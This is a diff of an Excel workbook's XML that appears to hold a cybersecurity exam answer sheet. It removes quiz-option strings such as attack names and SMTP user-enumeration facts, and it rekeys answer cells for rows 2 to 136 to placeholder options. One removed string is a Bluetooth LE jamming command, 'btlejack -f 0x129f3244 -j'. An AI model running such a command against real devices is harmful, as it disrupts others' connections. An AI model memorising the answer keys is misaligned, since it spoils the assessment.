-    <t>Web of trust (WOT)</t>
-  </si>
-  <si>
-    <t>btlejack -f 0x129f3244 -j</t>
-  </si>
-  <si>
-    <t>Period (.)</t>
-  </si>
-  <si>
-    <t>DDoS attack</t>
-  </si>
-  <si>
-    <t>An intruder sends a malicious attachment via email to a target.</t>
-  </si>
-  <si>
-    <t>Verbose failure messages</t>
-  </si>
-  <si>
-    <t>WS-Policy</t>
-  </si>
-  <si>
-    <t>WPA3-Personal</t>
-  </si>
-  <si>
-    <t>Blind SQL injection</t>
-  </si>
-  <si>
-    <t>The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.</t>
-  </si>
-  <si>
-    <t>When an attacker gathers system-level data, including account details and server names</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Spear-phishing attack </t>
-  </si>
-  <si>
-    <t>-D</t>
-  </si>
-  <si>
-    <t xml:space="preserve"> Pharming</t>
-  </si>
-  <si>
     <t>A</t>
   </si>
   <si>
     <t>B</t>
+  </si>
+  <si>
+    <t>A,B</t>
   </si>
 </sst>
 </file>
@@ -10694,8 +10211,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{E9F365E0-BA31-49F2-BED9-5E9F2D51F116}">
   <dimension ref="A1:J313"/>
   <sheetViews>
-    <sheetView topLeftCell="A296" workbookViewId="0">
-      <selection activeCell="D312" sqref="D312"/>
+    <sheetView tabSelected="1" topLeftCell="A295" workbookViewId="0">
+      <selection activeCell="B310" sqref="B310"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -10722,7 +10239,7 @@
         <v>1</v>
       </c>
       <c r="B2" s="5" t="s">
-        <v>481</v>
+        <v>504</v>
       </c>
       <c r="D2" t="b">
         <f>IF(B2=C2,TRUE,FALSE)</f>
@@ -10734,7 +10251,7 @@
         <v>2</v>
       </c>
       <c r="B3" s="5" t="s">
-        <v>482</v>
+        <v>504</v>
       </c>
       <c r="D3" t="b">
         <f t="shared" ref="D3:D66" si="0">IF(B3=C3,TRUE,FALSE)</f>
@@ -10746,7 +10263,7 @@
         <v>3</v>
       </c>
       <c r="B4" s="5" t="s">
-        <v>157</v>
+        <v>433</v>
       </c>
       <c r="D4" t="b">
         <f t="shared" si="0"/>
@@ -10758,7 +10275,7 @@
         <v>4</v>
       </c>
       <c r="B5" s="5" t="s">
-        <v>49</v>
+        <v>264</v>
       </c>
       <c r="D5" t="b">
         <f t="shared" si="0"/>
@@ -10770,7 +10287,7 @@
         <v>5</v>
       </c>
       <c r="B6" s="5" t="s">
-        <v>181</v>
+        <v>504</v>
       </c>
       <c r="D6" t="b">
         <f t="shared" si="0"/>
@@ -10782,7 +10299,7 @@
         <v>6</v>
       </c>
       <c r="B7" s="5" t="s">
-        <v>134</v>
+        <v>264</v>
       </c>
       <c r="D7" t="b">
         <f t="shared" si="0"/>
@@ -10794,7 +10311,7 @@
         <v>7</v>
       </c>
       <c r="B8" s="6" t="s">
-        <v>208</v>
+        <v>433</v>
       </c>
       <c r="D8" t="b">
         <f t="shared" si="0"/>
@@ -10806,7 +10323,7 @@
         <v>8</v>
       </c>
       <c r="B9" s="5" t="s">
-        <v>503</v>
+        <v>433</v>
       </c>
       <c r="D9" t="b">
         <f t="shared" si="0"/>
@@ -10818,7 +10335,7 @@
         <v>9</v>
       </c>
       <c r="B10" s="5" t="s">
-        <v>504</v>
+        <v>433</v>
       </c>
       <c r="D10" t="b">
         <f t="shared" si="0"/>
@@ -10830,7 +10347,7 @@
         <v>10</v>
       </c>
       <c r="B11" s="5" t="s">
-        <v>133</v>
+        <v>504</v>
       </c>
       <c r="D11" t="b">
         <f t="shared" si="0"/>
@@ -10842,7 +10359,7 @@
         <v>11</v>
       </c>
       <c r="B12" s="7" t="s">
-        <v>505</v>
+        <v>503</v>
       </c>
       <c r="D12" t="b">
         <f t="shared" si="0"/>
@@ -10854,7 +10371,7 @@
         <v>12</v>
       </c>
       <c r="B13" s="5" t="s">
-        <v>176</v>
+        <v>504</v>
       </c>
       <c r="D13" t="b">
         <f t="shared" si="0"/>
@@ -10866,7 +10383,7 @@
         <v>13</v>
       </c>
       <c r="B14" s="5" t="s">
-        <v>158</v>
+        <v>504</v>
       </c>
       <c r="D14" t="b">
         <f t="shared" si="0"/>
@@ -10878,7 +10395,7 @@
         <v>14</v>
       </c>
       <c r="B15" s="5" t="s">
-        <v>243</v>
+        <v>433</v>
       </c>
       <c r="D15" t="b">
         <f t="shared" si="0"/>
@@ -10890,7 +10407,7 @@
         <v>15</v>
       </c>
       <c r="B16" s="5" t="s">
-        <v>169</v>
+        <v>504</v>
       </c>
       <c r="D16" t="b">
         <f t="shared" si="0"/>
@@ -10902,7 +10419,7 @@
         <v>16</v>
       </c>
       <c r="B17" s="5" t="s">
-        <v>506</v>
+        <v>433</v>
       </c>
       <c r="D17" t="b">
         <f t="shared" si="0"/>
@@ -10914,7 +10431,7 @@
         <v>17</v>
       </c>
       <c r="B18" s="5" t="s">
-        <v>131</v>
+        <v>503</v>
       </c>
       <c r="D18" t="b">
         <f t="shared" si="0"/>
@@ -10926,7 +10443,7 @@
         <v>18</v>
       </c>
       <c r="B19" s="5" t="s">
-        <v>166</v>
+        <v>504</v>
       </c>
       <c r="D19" t="b">
         <f t="shared" si="0"/>
@@ -10938,7 +10455,7 @@
         <v>19</v>
       </c>
       <c r="B20" s="5" t="s">
-        <v>451</v>
+        <v>433</v>
       </c>
       <c r="D20" t="b">
         <f t="shared" si="0"/>
@@ -10950,7 +10467,7 @@
         <v>20</v>
       </c>
       <c r="B21" s="5" t="s">
-        <v>419</v>
+        <v>503</v>
       </c>
       <c r="D21" t="b">
         <f t="shared" si="0"/>
@@ -10962,7 +10479,7 @@
         <v>21</v>
       </c>
       <c r="B22" s="5" t="s">
-        <v>218</v>
+        <v>433</v>
       </c>
       <c r="D22" t="b">
         <f t="shared" si="0"/>
@@ -10974,7 +10491,7 @@
         <v>22</v>
       </c>
       <c r="B23" s="5" t="s">
-        <v>226</v>
+        <v>503</v>
       </c>
       <c r="D23" t="b">
         <f t="shared" si="0"/>
@@ -10986,7 +10503,7 @@
         <v>23</v>
       </c>
       <c r="B24" s="5" t="s">
-        <v>175</v>
+        <v>264</v>
       </c>
       <c r="D24" t="b">
         <f t="shared" si="0"/>
@@ -10998,7 +10515,7 @@
         <v>24</v>
       </c>
       <c r="B25" s="5" t="s">
-        <v>149</v>
+        <v>504</v>
       </c>
       <c r="D25" t="b">
         <f t="shared" si="0"/>
@@ -11010,7 +10527,7 @@
         <v>25</v>
       </c>
       <c r="B26" s="5" t="s">
-        <v>170</v>
+        <v>503</v>
       </c>
       <c r="D26" t="b">
         <f t="shared" si="0"/>
@@ -11022,7 +10539,7 @@
         <v>26</v>
       </c>
       <c r="B27" s="5" t="s">
-        <v>234</v>
+        <v>433</v>
       </c>
       <c r="D27" t="b">
         <f t="shared" si="0"/>
@@ -11034,7 +10551,7 @@
         <v>27</v>
       </c>
       <c r="B28" s="5" t="s">
-        <v>221</v>
+        <v>503</v>
       </c>
       <c r="D28" t="b">
         <f t="shared" si="0"/>
@@ -11046,7 +10563,7 @@
         <v>28</v>
       </c>
       <c r="B29" s="5" t="s">
-        <v>507</v>
+        <v>264</v>
       </c>
       <c r="D29" t="b">
         <f t="shared" si="0"/>
@@ -11058,7 +10575,7 @@
         <v>29</v>
       </c>
       <c r="B30" s="5" t="s">
-        <v>426</v>
+        <v>264</v>
       </c>
       <c r="D30" t="b">
         <f t="shared" si="0"/>
@@ -11070,7 +10587,7 @@
         <v>30</v>
       </c>
       <c r="B31" s="5" t="s">
-        <v>508</v>
+        <v>503</v>
       </c>
       <c r="D31" t="b">
         <f t="shared" si="0"/>
@@ -11082,7 +10599,7 @@
         <v>31</v>
       </c>
       <c r="B32" s="5" t="s">
-        <v>140</v>
+        <v>504</v>
       </c>
       <c r="D32" t="b">
         <f t="shared" si="0"/>
@@ -11094,7 +10611,7 @@
         <v>32</v>
       </c>
       <c r="B33" s="5" t="s">
-        <v>509</v>
+        <v>503</v>
       </c>
       <c r="D33" t="b">
         <f t="shared" si="0"/>
@@ -11106,7 +10623,7 @@
         <v>33</v>
       </c>
       <c r="B34" s="5" t="s">
-        <v>468</v>
+        <v>503</v>
       </c>
       <c r="D34" t="b">
         <f t="shared" si="0"/>
@@ -11118,7 +10635,7 @@
         <v>34</v>
       </c>
       <c r="B35" s="5" t="s">
-        <v>510</v>
+        <v>264</v>
       </c>
       <c r="D35" t="b">
         <f t="shared" si="0"/>
@@ -11130,7 +10647,7 @@
         <v>35</v>
       </c>
       <c r="B36" s="5" t="s">
-        <v>237</v>
+        <v>433</v>
       </c>
       <c r="D36" t="b">
         <f t="shared" si="0"/>
@@ -11142,7 +10659,7 @@
         <v>36</v>
       </c>
       <c r="B37" s="6" t="s">
-        <v>479</v>
+        <v>264</v>
       </c>
       <c r="D37" t="b">
         <f t="shared" si="0"/>
@@ -11154,7 +10671,7 @@
         <v>37</v>
       </c>
       <c r="B38" s="5" t="s">
-        <v>194</v>
+        <v>264</v>
       </c>
       <c r="D38" t="b">
         <f t="shared" si="0"/>
@@ -11166,7 +10683,7 @@
         <v>38</v>
       </c>
       <c r="B39" s="5" t="s">
-        <v>511</v>
+        <v>503</v>
       </c>
       <c r="D39" t="b">
         <f t="shared" si="0"/>
@@ -11178,7 +10695,7 @@
         <v>39</v>
       </c>
       <c r="B40" s="5" t="s">
-        <v>174</v>
+        <v>264</v>
       </c>
       <c r="D40" t="b">
         <f t="shared" si="0"/>
@@ -11190,7 +10707,7 @@
         <v>40</v>
       </c>
       <c r="B41" s="5" t="s">
-        <v>207</v>
+        <v>503</v>
       </c>
       <c r="D41" t="b">
         <f t="shared" si="0"/>
@@ -11202,7 +10719,7 @@
         <v>41</v>
       </c>
       <c r="B42" s="5" t="s">
-        <v>512</v>
+        <v>433</v>
       </c>
       <c r="D42" t="b">
         <f t="shared" si="0"/>
@@ -11214,7 +10731,7 @@
         <v>42</v>
       </c>
       <c r="B43" s="5" t="s">
-        <v>196</v>
+        <v>433</v>
       </c>
       <c r="D43" t="b">
         <f t="shared" si="0"/>
@@ -11226,7 +10743,7 @@
         <v>43</v>
       </c>
       <c r="B44" s="6" t="s">
-        <v>513</v>
+        <v>504</v>
       </c>
       <c r="D44" t="b">
         <f t="shared" si="0"/>
@@ -11238,7 +10755,7 @@
         <v>44</v>
       </c>
       <c r="B45" s="5" t="s">
-        <v>514</v>
+        <v>503</v>
       </c>
       <c r="D45" t="b">
         <f t="shared" si="0"/>
@@ -11250,7 +10767,7 @@
         <v>45</v>
       </c>
       <c r="B46" s="5" t="s">
-        <v>496</v>
+        <v>433</v>
       </c>
       <c r="D46" t="b">
         <f t="shared" si="0"/>
@@ -11262,7 +10779,7 @@
         <v>46</v>
       </c>
       <c r="B47" s="5" t="s">
-        <v>168</v>
+        <v>504</v>
       </c>
       <c r="D47" t="b">
         <f t="shared" si="0"/>
@@ -11274,7 +10791,7 @@
         <v>47</v>
       </c>
       <c r="B48" s="6" t="s">
-        <v>515</v>
+        <v>504</v>
       </c>
       <c r="D48" t="b">
         <f t="shared" si="0"/>
@@ -11286,7 +10803,7 @@
         <v>48</v>
       </c>
       <c r="B49" s="5" t="s">
-        <v>231</v>
+        <v>504</v>
       </c>
       <c r="D49" t="b">
         <f t="shared" si="0"/>
@@ -11298,7 +10815,7 @@
         <v>49</v>
       </c>
       <c r="B50" s="5" t="s">
-        <v>199</v>
+        <v>264</v>
       </c>
       <c r="D50" t="b">
         <f t="shared" si="0"/>
@@ -11310,7 +10827,7 @@
         <v>50</v>
       </c>
       <c r="B51" s="5" t="s">
-        <v>161</v>
+        <v>433</v>
       </c>
       <c r="D51" t="b">
         <f t="shared" si="0"/>
@@ -11322,7 +10839,7 @@
         <v>51</v>
       </c>
       <c r="B52" s="5" t="s">
-        <v>198</v>
+        <v>504</v>
       </c>
       <c r="D52" t="b">
         <f t="shared" si="0"/>
@@ -11334,7 +10851,7 @@
         <v>52</v>
       </c>
       <c r="B53" s="5" t="s">
-        <v>192</v>
+        <v>264</v>
       </c>
       <c r="D53" t="b">
         <f t="shared" si="0"/>
@@ -11346,7 +10863,7 @@
         <v>53</v>
       </c>
       <c r="B54" s="5" t="s">
-        <v>516</v>
+        <v>433</v>
       </c>
       <c r="D54" t="b">
         <f t="shared" si="0"/>
@@ -11358,7 +10875,7 @@
         <v>54</v>
       </c>
       <c r="B55" s="5" t="s">
-        <v>450</v>
+        <v>504</v>
       </c>
       <c r="D55" t="b">
         <f t="shared" si="0"/>
@@ -11370,7 +10887,7 @@
         <v>55</v>
       </c>
       <c r="B56" s="5" t="s">
-        <v>471</v>
+        <v>503</v>
       </c>
       <c r="D56" t="b">
         <f t="shared" si="0"/>
@@ -11382,7 +10899,7 @@
         <v>56</v>
       </c>
       <c r="B57" s="5" t="s">
-        <v>200</v>
+        <v>433</v>
       </c>
       <c r="D57" t="b">
         <f t="shared" si="0"/>
@@ -11394,7 +10911,7 @@
         <v>57</v>
       </c>
       <c r="B58" s="5" t="s">
-        <v>494</v>
+        <v>504</v>
       </c>
       <c r="D58" t="b">
         <f t="shared" si="0"/>
@@ -11406,7 +10923,7 @@
         <v>58</v>
       </c>
       <c r="B59" s="5" t="s">
-        <v>414</v>
+        <v>503</v>
       </c>
       <c r="D59" t="b">
         <f t="shared" si="0"/>
@@ -11418,7 +10935,7 @@
         <v>59</v>
       </c>
       <c r="B60" s="6" t="s">
-        <v>189</v>
+        <v>504</v>
       </c>
       <c r="D60" t="b">
         <f t="shared" si="0"/>
@@ -11430,7 +10947,7 @@
         <v>60</v>
       </c>
       <c r="B61" s="5" t="s">
-        <v>130</v>
+        <v>433</v>
       </c>
       <c r="D61" t="b">
         <f t="shared" si="0"/>
@@ -11442,7 +10959,7 @@
         <v>61</v>
       </c>
       <c r="B62" s="5" t="s">
-        <v>202</v>
+        <v>433</v>
       </c>
       <c r="D62" t="b">
         <f t="shared" si="0"/>
@@ -11454,7 +10971,7 @@
         <v>62</v>
       </c>
       <c r="B63" s="5" t="s">
-        <v>438</v>
+        <v>264</v>
       </c>
       <c r="D63" t="b">
         <f t="shared" si="0"/>
@@ -11466,7 +10983,7 @@
         <v>63</v>
       </c>
       <c r="B64" s="5" t="s">
-        <v>330</v>
+        <v>504</v>
       </c>
       <c r="D64" t="b">
         <f t="shared" si="0"/>
@@ -11478,7 +10995,7 @@
         <v>64</v>
       </c>
       <c r="B65" s="5" t="s">
-        <v>217</v>
+        <v>504</v>
       </c>
       <c r="D65" t="b">
         <f t="shared" si="0"/>
@@ -11490,7 +11007,7 @@
         <v>65</v>
       </c>
       <c r="B66" s="5" t="s">
-        <v>167</v>
+        <v>433</v>
       </c>
       <c r="D66" t="b">
         <f t="shared" si="0"/>
@@ -11502,7 +11019,7 @@
         <v>66</v>
       </c>
       <c r="B67" s="5" t="s">
-        <v>399</v>
+        <v>504</v>
       </c>
       <c r="D67" t="b">
         <f t="shared" ref="D67:D130" si="1">IF(B67=C67,TRUE,FALSE)</f>
@@ -11514,7 +11031,7 @@
         <v>67</v>
       </c>
       <c r="B68" s="5" t="s">
-        <v>212</v>
+        <v>503</v>
       </c>
       <c r="D68" t="b">
         <f t="shared" si="1"/>
@@ -11525,8 +11042,8 @@
       <c r="A69" s="1">
         <v>68</v>
       </c>
-      <c r="B69" s="5">
-        <v>48101</v>
+      <c r="B69" s="5" t="s">
+        <v>504</v>
       </c>
       <c r="D69" t="b">
         <f t="shared" si="1"/>
@@ -11538,7 +11055,7 @@
         <v>69</v>
       </c>
       <c r="B70" s="5" t="s">
-        <v>517</v>
+        <v>504</v>
       </c>
       <c r="D70" t="b">
         <f t="shared" si="1"/>
@@ -11550,7 +11067,7 @@
         <v>70</v>
       </c>
       <c r="B71" s="5" t="s">
-        <v>215</v>
+        <v>433</v>
       </c>
       <c r="D71" t="b">
         <f t="shared" si="1"/>
@@ -11562,7 +11079,7 @@
         <v>71</v>
       </c>
       <c r="B72" s="5" t="s">
-        <v>143</v>
+        <v>433</v>
       </c>
       <c r="D72" t="b">
         <f t="shared" si="1"/>
@@ -11574,7 +11091,7 @@
         <v>72</v>
       </c>
       <c r="B73" s="5" t="s">
-        <v>229</v>
+        <v>433</v>
       </c>
       <c r="D73" t="b">
         <f t="shared" si="1"/>
@@ -11586,7 +11103,7 @@
         <v>73</v>
       </c>
       <c r="B74" s="5" t="s">
-        <v>228</v>
+        <v>433</v>
       </c>
       <c r="D74" t="b">
         <f t="shared" si="1"/>
@@ -11598,7 +11115,7 @@
         <v>74</v>
       </c>
       <c r="B75" s="5" t="s">
-        <v>241</v>
+        <v>503</v>
       </c>
       <c r="D75" t="b">
         <f t="shared" si="1"/>
@@ -11610,7 +11127,7 @@
         <v>75</v>
       </c>
       <c r="B76" s="5" t="s">
-        <v>518</v>
+        <v>504</v>
       </c>
       <c r="D76" t="b">
         <f t="shared" si="1"/>
@@ -11622,7 +11139,7 @@
         <v>76</v>
       </c>
       <c r="B77" s="5" t="s">
-        <v>519</v>
+        <v>503</v>
       </c>
       <c r="D77" t="b">
         <f t="shared" si="1"/>
@@ -11634,7 +11151,7 @@
         <v>77</v>
       </c>
       <c r="B78" s="5" t="s">
-        <v>171</v>
+        <v>433</v>
       </c>
       <c r="D78" t="b">
         <f t="shared" si="1"/>
@@ -11646,7 +11163,7 @@
         <v>78</v>
       </c>
       <c r="B79" s="5" t="s">
-        <v>501</v>
+        <v>504</v>
       </c>
       <c r="D79" t="b">
         <f t="shared" si="1"/>
@@ -11658,7 +11175,7 @@
         <v>79</v>
       </c>
       <c r="B80" s="5" t="s">
-        <v>190</v>
+        <v>433</v>
       </c>
       <c r="D80" t="b">
         <f t="shared" si="1"/>
@@ -11670,7 +11187,7 @@
         <v>80</v>
       </c>
       <c r="B81" s="5" t="s">
-        <v>454</v>
+        <v>504</v>
       </c>
       <c r="D81" t="b">
         <f t="shared" si="1"/>
@@ -11682,7 +11199,7 @@
         <v>81</v>
       </c>
       <c r="B82" s="5" t="s">
-        <v>183</v>
+        <v>504</v>
       </c>
       <c r="D82" t="b">
         <f t="shared" si="1"/>
@@ -11694,7 +11211,7 @@
         <v>82</v>
       </c>
       <c r="B83" s="5" t="s">
-        <v>152</v>
+        <v>504</v>
       </c>
       <c r="D83" t="b">
         <f t="shared" si="1"/>
@@ -11706,7 +11223,7 @@
         <v>83</v>
       </c>
       <c r="B84" s="5" t="s">
-        <v>203</v>
+        <v>504</v>
       </c>
       <c r="D84" t="b">
         <f t="shared" si="1"/>
@@ -11718,7 +11235,7 @@
         <v>84</v>
       </c>
       <c r="B85" s="5" t="s">
-        <v>520</v>
+        <v>264</v>
       </c>
       <c r="D85" t="b">
         <f t="shared" si="1"/>
@@ -11730,7 +11247,7 @@
         <v>85</v>
       </c>
       <c r="B86" s="5" t="s">
-        <v>195</v>
+        <v>504</v>
       </c>
       <c r="D86" t="b">
         <f t="shared" si="1"/>
@@ -11741,8 +11258,8 @@
       <c r="A87" s="1">
         <v>86</v>
       </c>
-      <c r="B87" s="5">
-        <v>128</v>
+      <c r="B87" s="5" t="s">
+        <v>503</v>
       </c>
       <c r="D87" t="b">
         <f t="shared" si="1"/>
@@ -11754,7 +11271,7 @@
         <v>87</v>
       </c>
       <c r="B88" s="5" t="s">
-        <v>466</v>
+        <v>264</v>
       </c>
       <c r="D88" t="b">
         <f t="shared" si="1"/>
@@ -11766,7 +11283,7 @@
         <v>88</v>
       </c>
       <c r="B89" s="5" t="s">
-        <v>236</v>
+        <v>264</v>
       </c>
       <c r="D89" t="b">
         <f t="shared" si="1"/>
@@ -11778,7 +11295,7 @@
         <v>89</v>
       </c>
       <c r="B90" s="5" t="s">
-        <v>487</v>
+        <v>503</v>
       </c>
       <c r="D90" t="b">
         <f t="shared" si="1"/>
@@ -11790,7 +11307,7 @@
         <v>90</v>
       </c>
       <c r="B91" s="5" t="s">
-        <v>490</v>
+        <v>433</v>
       </c>
       <c r="D91" t="b">
         <f t="shared" si="1"/>
@@ -11802,7 +11319,7 @@
         <v>91</v>
       </c>
       <c r="B92" s="5" t="s">
-        <v>521</v>
+        <v>503</v>
       </c>
       <c r="D92" t="b">
         <f t="shared" si="1"/>
@@ -11814,7 +11331,7 @@
         <v>92</v>
       </c>
       <c r="B93" s="5" t="s">
-        <v>522</v>
+        <v>433</v>
       </c>
       <c r="D93" t="b">
         <f t="shared" si="1"/>
@@ -11826,7 +11343,7 @@
         <v>93</v>
       </c>
       <c r="B94" s="5" t="s">
-        <v>523</v>
+        <v>503</v>
       </c>
       <c r="D94" t="b">
         <f t="shared" si="1"/>
@@ -11838,7 +11355,7 @@
         <v>94</v>
       </c>
       <c r="B95" s="5" t="s">
-        <v>404</v>
+        <v>264</v>
       </c>
       <c r="D95" t="b">
         <f t="shared" si="1"/>
@@ -11850,7 +11367,7 @@
         <v>95</v>
       </c>
       <c r="B96" s="5" t="s">
-        <v>163</v>
+        <v>504</v>
       </c>
       <c r="D96" t="b">
         <f t="shared" si="1"/>
@@ -11862,7 +11379,7 @@
         <v>96</v>
       </c>
       <c r="B97" s="5" t="s">
-        <v>485</v>
+        <v>264</v>
       </c>
       <c r="D97" t="b">
         <f t="shared" si="1"/>
@@ -11874,7 +11391,7 @@
         <v>97</v>
       </c>
       <c r="B98" s="5" t="s">
-        <v>390</v>
+        <v>433</v>
       </c>
       <c r="D98" t="b">
         <f t="shared" si="1"/>
@@ -11886,7 +11403,7 @@
         <v>98</v>
       </c>
       <c r="B99" s="5" t="s">
-        <v>87</v>
+        <v>433</v>
       </c>
       <c r="D99" t="b">
         <f t="shared" si="1"/>
@@ -11898,7 +11415,7 @@
         <v>99</v>
       </c>
       <c r="B100" s="5" t="s">
-        <v>216</v>
+        <v>503</v>
       </c>
       <c r="D100" t="b">
         <f t="shared" si="1"/>
@@ -11910,7 +11427,7 @@
         <v>100</v>
       </c>
       <c r="B101" s="5" t="s">
-        <v>373</v>
+        <v>264</v>
       </c>
       <c r="D101" t="b">
         <f t="shared" si="1"/>
@@ -11922,7 +11439,7 @@
         <v>101</v>
       </c>
       <c r="B102" s="5" t="s">
-        <v>524</v>
+        <v>433</v>
       </c>
       <c r="D102" t="b">
         <f t="shared" si="1"/>
@@ -11934,7 +11451,7 @@
         <v>102</v>
       </c>
       <c r="B103" s="5" t="s">
-        <v>206</v>
+        <v>503</v>
       </c>
       <c r="D103" t="b">
         <f t="shared" si="1"/>
@@ -11946,7 +11463,7 @@
         <v>103</v>
       </c>
       <c r="B104" s="5" t="s">
-        <v>398</v>
+        <v>433</v>
       </c>
       <c r="D104" t="b">
         <f t="shared" si="1"/>
@@ -11958,7 +11475,7 @@
         <v>104</v>
       </c>
       <c r="B105" s="5" t="s">
-        <v>172</v>
+        <v>504</v>
       </c>
       <c r="D105" t="b">
         <f t="shared" si="1"/>
@@ -11970,7 +11487,7 @@
         <v>105</v>
       </c>
       <c r="B106" s="6" t="s">
-        <v>498</v>
+        <v>503</v>
       </c>
       <c r="D106" t="b">
         <f t="shared" si="1"/>
@@ -11982,7 +11499,7 @@
         <v>106</v>
       </c>
       <c r="B107" s="6" t="s">
-        <v>411</v>
+        <v>433</v>
       </c>
       <c r="D107" t="b">
         <f t="shared" si="1"/>
@@ -11994,7 +11511,7 @@
         <v>107</v>
       </c>
       <c r="B108" s="5" t="s">
-        <v>222</v>
+        <v>433</v>
       </c>
       <c r="D108" t="b">
         <f t="shared" si="1"/>
@@ -12006,7 +11523,7 @@
         <v>108</v>
       </c>
       <c r="B109" s="5" t="s">
-        <v>347</v>
+        <v>264</v>
       </c>
       <c r="D109" t="b">
         <f t="shared" si="1"/>
@@ -12018,7 +11535,7 @@
         <v>109</v>
       </c>
       <c r="B110" s="5" t="s">
-        <v>434</v>
+        <v>503</v>
       </c>
       <c r="D110" t="b">
         <f t="shared" si="1"/>
@@ -12030,7 +11547,7 @@
         <v>110</v>
       </c>
       <c r="B111" s="5" t="s">
-        <v>160</v>
+        <v>504</v>
       </c>
       <c r="D111" t="b">
         <f t="shared" si="1"/>
@@ -12042,7 +11559,7 @@
         <v>111</v>
       </c>
       <c r="B112" s="5" t="s">
-        <v>153</v>
+        <v>504</v>
       </c>
       <c r="D112" t="b">
         <f t="shared" si="1"/>
@@ -12054,7 +11571,7 @@
         <v>112</v>
       </c>
       <c r="B113" s="5" t="s">
-        <v>429</v>
+        <v>504</v>
       </c>
       <c r="D113" t="b">
         <f t="shared" si="1"/>
@@ -12066,7 +11583,7 @@
         <v>113</v>
       </c>
       <c r="B114" s="5" t="s">
-        <v>421</v>
+        <v>503</v>
       </c>
       <c r="D114" t="b">
         <f t="shared" si="1"/>
@@ -12078,7 +11595,7 @@
         <v>114</v>
       </c>
       <c r="B115" s="5" t="s">
-        <v>184</v>
+        <v>264</v>
       </c>
       <c r="D115" t="b">
         <f t="shared" si="1"/>
@@ -12090,7 +11607,7 @@
         <v>115</v>
       </c>
       <c r="B116" s="5" t="s">
-        <v>224</v>
+        <v>264</v>
       </c>
       <c r="D116" t="b">
         <f t="shared" si="1"/>
@@ -12102,7 +11619,7 @@
         <v>116</v>
       </c>
       <c r="B117" s="5" t="s">
-        <v>467</v>
+        <v>504</v>
       </c>
       <c r="D117" t="b">
         <f t="shared" si="1"/>
@@ -12114,7 +11631,7 @@
         <v>117</v>
       </c>
       <c r="B118" s="5" t="s">
-        <v>441</v>
+        <v>264</v>
       </c>
       <c r="D118" t="b">
         <f t="shared" si="1"/>
@@ -12126,7 +11643,7 @@
         <v>118</v>
       </c>
       <c r="B119" s="5" t="s">
-        <v>525</v>
+        <v>503</v>
       </c>
       <c r="D119" t="b">
         <f t="shared" si="1"/>
@@ -12138,7 +11655,7 @@
         <v>119</v>
       </c>
       <c r="B120" s="5" t="s">
-        <v>377</v>
+        <v>433</v>
       </c>
       <c r="D120" t="b">
         <f t="shared" si="1"/>
@@ -12150,7 +11667,7 @@
         <v>120</v>
       </c>
       <c r="B121" s="5" t="s">
-        <v>209</v>
+        <v>505</v>
       </c>
       <c r="D121" t="b">
         <f t="shared" si="1"/>
@@ -12162,7 +11679,7 @@
         <v>121</v>
       </c>
       <c r="B122" s="5" t="s">
-        <v>147</v>
+        <v>264</v>
       </c>
       <c r="D122" t="b">
         <f t="shared" si="1"/>
@@ -12174,7 +11691,7 @@
         <v>122</v>
       </c>
       <c r="B123" s="5" t="s">
-        <v>483</v>
+        <v>264</v>
       </c>
       <c r="D123" t="b">
         <f t="shared" si="1"/>
@@ -12186,7 +11703,7 @@
         <v>123</v>
       </c>
       <c r="B124" s="5" t="s">
-        <v>244</v>
+        <v>504</v>
       </c>
       <c r="D124" t="b">
         <f t="shared" si="1"/>
@@ -12198,7 +11715,7 @@
         <v>124</v>
       </c>
       <c r="B125" s="5" t="s">
-        <v>493</v>
+        <v>433</v>
       </c>
       <c r="D125" t="b">
         <f t="shared" si="1"/>
@@ -12210,7 +11727,7 @@
         <v>125</v>
       </c>
       <c r="B126" s="5" t="s">
-        <v>230</v>
+        <v>264</v>
       </c>
       <c r="D126" t="b">
         <f t="shared" si="1"/>
@@ -12222,7 +11739,7 @@
         <v>126</v>
       </c>
       <c r="B127" s="6" t="s">
-        <v>526</v>
+        <v>503</v>
       </c>
       <c r="D127" t="b">
         <f t="shared" si="1"/>
@@ -12234,7 +11751,7 @@
         <v>127</v>
       </c>
       <c r="B128" s="6" t="s">
-        <v>527</v>
+        <v>504</v>
       </c>
       <c r="D128" t="b">
         <f t="shared" si="1"/>
@@ -12246,7 +11763,7 @@
         <v>128</v>
       </c>
       <c r="B129" s="5" t="s">
-        <v>528</v>
+        <v>503</v>
       </c>
       <c r="D129" t="b">
         <f t="shared" si="1"/>
@@ -12258,7 +11775,7 @@
         <v>129</v>
       </c>
       <c r="B130" s="5" t="s">
-        <v>529</v>
+        <v>264</v>
       </c>
       <c r="D130" t="b">
         <f t="shared" si="1"/>
@@ -12270,7 +11787,7 @@
         <v>130</v>
       </c>
       <c r="B131" s="5" t="s">
-        <v>530</v>
+        <v>433</v>
       </c>
       <c r="D131" t="b">
         <f t="shared" ref="D131:D194" si="2">IF(B131=C131,TRUE,FALSE)</f>
@@ -12282,7 +11799,7 @@
         <v>131</v>
       </c>
       <c r="B132" s="5" t="s">
-        <v>531</v>
+        <v>433</v>
       </c>
       <c r="D132" t="b">
         <f t="shared" si="2"/>
@@ -12294,7 +11811,7 @@
         <v>132</v>
       </c>
       <c r="B133" s="5" t="s">
-        <v>532</v>
+        <v>503</v>
       </c>
       <c r="D133" t="b">
         <f t="shared" si="2"/>
@@ -12306,7 +11823,7 @@
         <v>133</v>
       </c>
       <c r="B134" s="5" t="s">
-        <v>533</v>
+        <v>433</v>
       </c>
       <c r="D134" t="b">
         <f t="shared" si="2"/>
@@ -12318,7 +11835,7 @@
         <v>134</v>
       </c>
       <c r="B135" s="5" t="s">
-        <v>534</v>
+        <v>433</v>
       </c>
       <c r="D135" t="b">
         <f t="shared" si="2"/>
@@ -12330,7 +11847,7 @@
         <v>135</v>
       </c>
       <c r="B136" s="5" t="s">
-        <v>535</v>
+        <v>264</v>
       </c>
       <c r="D136" t="b">
